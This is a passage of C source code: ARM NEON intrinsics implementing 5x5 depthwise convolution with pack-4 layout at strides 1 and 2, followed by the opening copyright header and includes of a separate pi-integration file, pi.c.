_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
_sum1 = vmlaq_f32(_sum1, _k20, _r21);
_sum1 = vmlaq_f32(_sum1, _k21, _r22);
_sum1 = vmlaq_f32(_sum1, _k22, _r23);
_sum1 = vmlaq_f32(_sum1, _k23, _r24);
_sum1 = vmlaq_f32(_sum1, _k24, _r25);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _r35 = vld1q_f32(r3+20);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
_sum1 = vmlaq_f32(_sum1, _k30, _r31);
_sum1 = vmlaq_f32(_sum1, _k31, _r32);
_sum1 = vmlaq_f32(_sum1, _k32, _r33);
_sum1 = vmlaq_f32(_sum1, _k33, _r34);
_sum1 = vmlaq_f32(_sum1, _k34, _r35);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _r45 = vld1q_f32(r4+20);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
_sum1 = vmlaq_f32(_sum1, _k40, _r41);
_sum1 = vmlaq_f32(_sum1, _k41, _r42);
_sum1 = vmlaq_f32(_sum1, _k42, _r43);
_sum1 = vmlaq_f32(_sum1, _k43, _r44);
_sum1 = vmlaq_f32(_sum1, _k44, _r45);
vst1q_f32(outptr0, _sum0);
vst1q_f32(outptr0+4, _sum1);
r0 += 8;
r1 += 8;
r2 += 8;
r3 += 8;
r4 += 8;
outptr0 += 8;
}
for (; j < outw; j++)
{
float32x4_t _sum0 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
vst1q_f32(outptr0, _sum0);
r0 += 4;
r1 += 4;
r2 += 4;
r3 += 4;
r4 += 4;
outptr0 += 4;
}
r0 += 4*4;
r1 += 4*4;
r2 += 4*4;
r3 += 4*4;
r4 += 4*4;
}
}
}
static void convdw5x5s2_pack4_neon(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel, const Mat& _bias, const Option& opt)
{
int w = bottom_blob.w;
int outw = top_blob.w;
int outh = top_blob.h;
const int group = bottom_blob.c;
const int tailstep = (w - 2*outw + w) * 4;
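// Stride 2: each output row consumes 2*outw input positions, so tailstep
// jumps past the rest of the row plus one skipped input row (4 lanes each).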
const float* bias = _bias;
#pragma omp parallel for num_threads(opt.num_threads)
for (int g=0; g<group; g++)
{
Mat out = top_blob.channel(g);
float32x4_t _bias0 = bias ? vld1q_f32((const float*)bias + g * 4) : vdupq_n_f32(0.f);
const float* k0 = kernel.row(g);
float* outptr0 = out;
const Mat img0 = bottom_blob.channel(g);
const float* r0 = img0.row(0);
const float* r1 = img0.row(1);
const float* r2 = img0.row(2);
const float* r3 = img0.row(3);
const float* r4 = img0.row(4);
int i = 0;
for (; i < outh; i++)
{
int j = 0;
for (; j+3 < outw; j+=4)
{
float32x4_t _sum0 = _bias0;
float32x4_t _sum1 = _bias0;
float32x4_t _sum2 = _bias0;
float32x4_t _sum3 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _r05 = vld1q_f32(r0+20);
float32x4_t _r06 = vld1q_f32(r0+24);
float32x4_t _r07 = vld1q_f32(r0+28);
float32x4_t _r08 = vld1q_f32(r0+32);
float32x4_t _r09 = vld1q_f32(r0+36);
float32x4_t _r010 = vld1q_f32(r0+40);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
_sum1 = vmlaq_f32(_sum1, _k00, _r02);
_sum1 = vmlaq_f32(_sum1, _k01, _r03);
_sum1 = vmlaq_f32(_sum1, _k02, _r04);
_sum1 = vmlaq_f32(_sum1, _k03, _r05);
_sum1 = vmlaq_f32(_sum1, _k04, _r06);
_sum2 = vmlaq_f32(_sum2, _k00, _r04);
_sum2 = vmlaq_f32(_sum2, _k01, _r05);
_sum2 = vmlaq_f32(_sum2, _k02, _r06);
_sum2 = vmlaq_f32(_sum2, _k03, _r07);
_sum2 = vmlaq_f32(_sum2, _k04, _r08);
_sum3 = vmlaq_f32(_sum3, _k00, _r06);
_sum3 = vmlaq_f32(_sum3, _k01, _r07);
_sum3 = vmlaq_f32(_sum3, _k02, _r08);
_sum3 = vmlaq_f32(_sum3, _k03, _r09);
_sum3 = vmlaq_f32(_sum3, _k04, _r010);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _r15 = vld1q_f32(r1+20);
float32x4_t _r16 = vld1q_f32(r1+24);
float32x4_t _r17 = vld1q_f32(r1+28);
float32x4_t _r18 = vld1q_f32(r1+32);
float32x4_t _r19 = vld1q_f32(r1+36);
float32x4_t _r110 = vld1q_f32(r1+40);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
_sum1 = vmlaq_f32(_sum1, _k10, _r12);
_sum1 = vmlaq_f32(_sum1, _k11, _r13);
_sum1 = vmlaq_f32(_sum1, _k12, _r14);
_sum1 = vmlaq_f32(_sum1, _k13, _r15);
_sum1 = vmlaq_f32(_sum1, _k14, _r16);
_sum2 = vmlaq_f32(_sum2, _k10, _r14);
_sum2 = vmlaq_f32(_sum2, _k11, _r15);
_sum2 = vmlaq_f32(_sum2, _k12, _r16);
_sum2 = vmlaq_f32(_sum2, _k13, _r17);
_sum2 = vmlaq_f32(_sum2, _k14, _r18);
_sum3 = vmlaq_f32(_sum3, _k10, _r16);
_sum3 = vmlaq_f32(_sum3, _k11, _r17);
_sum3 = vmlaq_f32(_sum3, _k12, _r18);
_sum3 = vmlaq_f32(_sum3, _k13, _r19);
_sum3 = vmlaq_f32(_sum3, _k14, _r110);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _r25 = vld1q_f32(r2+20);
float32x4_t _r26 = vld1q_f32(r2+24);
float32x4_t _r27 = vld1q_f32(r2+28);
float32x4_t _r28 = vld1q_f32(r2+32);
float32x4_t _r29 = vld1q_f32(r2+36);
float32x4_t _r210 = vld1q_f32(r2+40);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
_sum1 = vmlaq_f32(_sum1, _k20, _r22);
_sum1 = vmlaq_f32(_sum1, _k21, _r23);
_sum1 = vmlaq_f32(_sum1, _k22, _r24);
_sum1 = vmlaq_f32(_sum1, _k23, _r25);
_sum1 = vmlaq_f32(_sum1, _k24, _r26);
_sum2 = vmlaq_f32(_sum2, _k20, _r24);
_sum2 = vmlaq_f32(_sum2, _k21, _r25);
_sum2 = vmlaq_f32(_sum2, _k22, _r26);
_sum2 = vmlaq_f32(_sum2, _k23, _r27);
_sum2 = vmlaq_f32(_sum2, _k24, _r28);
_sum3 = vmlaq_f32(_sum3, _k20, _r26);
_sum3 = vmlaq_f32(_sum3, _k21, _r27);
_sum3 = vmlaq_f32(_sum3, _k22, _r28);
_sum3 = vmlaq_f32(_sum3, _k23, _r29);
_sum3 = vmlaq_f32(_sum3, _k24, _r210);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _r35 = vld1q_f32(r3+20);
float32x4_t _r36 = vld1q_f32(r3+24);
float32x4_t _r37 = vld1q_f32(r3+28);
float32x4_t _r38 = vld1q_f32(r3+32);
float32x4_t _r39 = vld1q_f32(r3+36);
float32x4_t _r310 = vld1q_f32(r3+40);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
_sum1 = vmlaq_f32(_sum1, _k30, _r32);
_sum1 = vmlaq_f32(_sum1, _k31, _r33);
_sum1 = vmlaq_f32(_sum1, _k32, _r34);
_sum1 = vmlaq_f32(_sum1, _k33, _r35);
_sum1 = vmlaq_f32(_sum1, _k34, _r36);
_sum2 = vmlaq_f32(_sum2, _k30, _r34);
_sum2 = vmlaq_f32(_sum2, _k31, _r35);
_sum2 = vmlaq_f32(_sum2, _k32, _r36);
_sum2 = vmlaq_f32(_sum2, _k33, _r37);
_sum2 = vmlaq_f32(_sum2, _k34, _r38);
_sum3 = vmlaq_f32(_sum3, _k30, _r36);
_sum3 = vmlaq_f32(_sum3, _k31, _r37);
_sum3 = vmlaq_f32(_sum3, _k32, _r38);
_sum3 = vmlaq_f32(_sum3, _k33, _r39);
_sum3 = vmlaq_f32(_sum3, _k34, _r310);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _r45 = vld1q_f32(r4+20);
float32x4_t _r46 = vld1q_f32(r4+24);
float32x4_t _r47 = vld1q_f32(r4+28);
float32x4_t _r48 = vld1q_f32(r4+32);
float32x4_t _r49 = vld1q_f32(r4+36);
float32x4_t _r410 = vld1q_f32(r4+40);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
_sum1 = vmlaq_f32(_sum1, _k40, _r42);
_sum1 = vmlaq_f32(_sum1, _k41, _r43);
_sum1 = vmlaq_f32(_sum1, _k42, _r44);
_sum1 = vmlaq_f32(_sum1, _k43, _r45);
_sum1 = vmlaq_f32(_sum1, _k44, _r46);
_sum2 = vmlaq_f32(_sum2, _k40, _r44);
_sum2 = vmlaq_f32(_sum2, _k41, _r45);
_sum2 = vmlaq_f32(_sum2, _k42, _r46);
_sum2 = vmlaq_f32(_sum2, _k43, _r47);
_sum2 = vmlaq_f32(_sum2, _k44, _r48);
_sum3 = vmlaq_f32(_sum3, _k40, _r46);
_sum3 = vmlaq_f32(_sum3, _k41, _r47);
_sum3 = vmlaq_f32(_sum3, _k42, _r48);
_sum3 = vmlaq_f32(_sum3, _k43, _r49);
_sum3 = vmlaq_f32(_sum3, _k44, _r410);
vst1q_f32(outptr0, _sum0);
vst1q_f32(outptr0+4, _sum1);
vst1q_f32(outptr0+8, _sum2);
vst1q_f32(outptr0+12, _sum3);
r0 += 8*4;
r1 += 8*4;
r2 += 8*4;
r3 += 8*4;
r4 += 8*4;
outptr0 += 16;
}
for (; j+1 < outw; j+=2)
{
float32x4_t _sum0 = _bias0;
float32x4_t _sum1 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _r05 = vld1q_f32(r0+20);
float32x4_t _r06 = vld1q_f32(r0+24);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
_sum1 = vmlaq_f32(_sum1, _k00, _r02);
_sum1 = vmlaq_f32(_sum1, _k01, _r03);
_sum1 = vmlaq_f32(_sum1, _k02, _r04);
_sum1 = vmlaq_f32(_sum1, _k03, _r05);
_sum1 = vmlaq_f32(_sum1, _k04, _r06);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _r15 = vld1q_f32(r1+20);
float32x4_t _r16 = vld1q_f32(r1+24);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
_sum1 = vmlaq_f32(_sum1, _k10, _r12);
_sum1 = vmlaq_f32(_sum1, _k11, _r13);
_sum1 = vmlaq_f32(_sum1, _k12, _r14);
_sum1 = vmlaq_f32(_sum1, _k13, _r15);
_sum1 = vmlaq_f32(_sum1, _k14, _r16);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _r25 = vld1q_f32(r2+20);
float32x4_t _r26 = vld1q_f32(r2+24);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
_sum1 = vmlaq_f32(_sum1, _k20, _r22);
_sum1 = vmlaq_f32(_sum1, _k21, _r23);
_sum1 = vmlaq_f32(_sum1, _k22, _r24);
_sum1 = vmlaq_f32(_sum1, _k23, _r25);
_sum1 = vmlaq_f32(_sum1, _k24, _r26);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _r35 = vld1q_f32(r3+20);
float32x4_t _r36 = vld1q_f32(r3+24);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
_sum1 = vmlaq_f32(_sum1, _k30, _r32);
_sum1 = vmlaq_f32(_sum1, _k31, _r33);
_sum1 = vmlaq_f32(_sum1, _k32, _r34);
_sum1 = vmlaq_f32(_sum1, _k33, _r35);
_sum1 = vmlaq_f32(_sum1, _k34, _r36);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _r45 = vld1q_f32(r4+20);
float32x4_t _r46 = vld1q_f32(r4+24);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
_sum1 = vmlaq_f32(_sum1, _k40, _r42);
_sum1 = vmlaq_f32(_sum1, _k41, _r43);
_sum1 = vmlaq_f32(_sum1, _k42, _r44);
_sum1 = vmlaq_f32(_sum1, _k43, _r45);
_sum1 = vmlaq_f32(_sum1, _k44, _r46);
vst1q_f32(outptr0, _sum0);
vst1q_f32(outptr0+4, _sum1);
r0 += 4*4;
r1 += 4*4;
r2 += 4*4;
r3 += 4*4;
r4 += 4*4;
outptr0 += 8;
}
for (; j < outw; j++)
{
float32x4_t _sum0 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
vst1q_f32(outptr0, _sum0);
r0 += 2*4;
r1 += 2*4;
r2 += 2*4;
r3 += 2*4;
r4 += 2*4;
outptr0 += 4;
}
r0 += tailstep;
r1 += tailstep;
r2 += tailstep;
r3 += tailstep;
r4 += tailstep;
}
}
}
|
pi.c | /*
 * Copyright (C) 2010 - 2015 Intel Corporation. All Rights Reserved.
*
* The source code contained or described herein and all
* documents related to the source code ("Material") are owned by
* Intel Corporation or its suppliers or licensors. Title to the
* Material remains with Intel Corporation or its suppliers and
* licensors. The Material is protected by worldwide copyright
* laws and treaty provisions. No part of the Material may be
* used, copied, reproduced, modified, published, uploaded,
* posted, transmitted, distributed, or disclosed in any way
* except as expressly provided in the license provided with the
* Materials. No license under any patent, copyright, trade
* secret or other intellectual property right is granted to or
* conferred upon you by disclosure or delivery of the Materials,
* either expressly, by implication, inducement, estoppel or
* otherwise, except as expressly provided in the license
* provided with the Materials
*
*/
// Simple-minded numerical integration to approximate pi
#include <stdio.h>
#include <sys/time.h>
#define N 2000000000
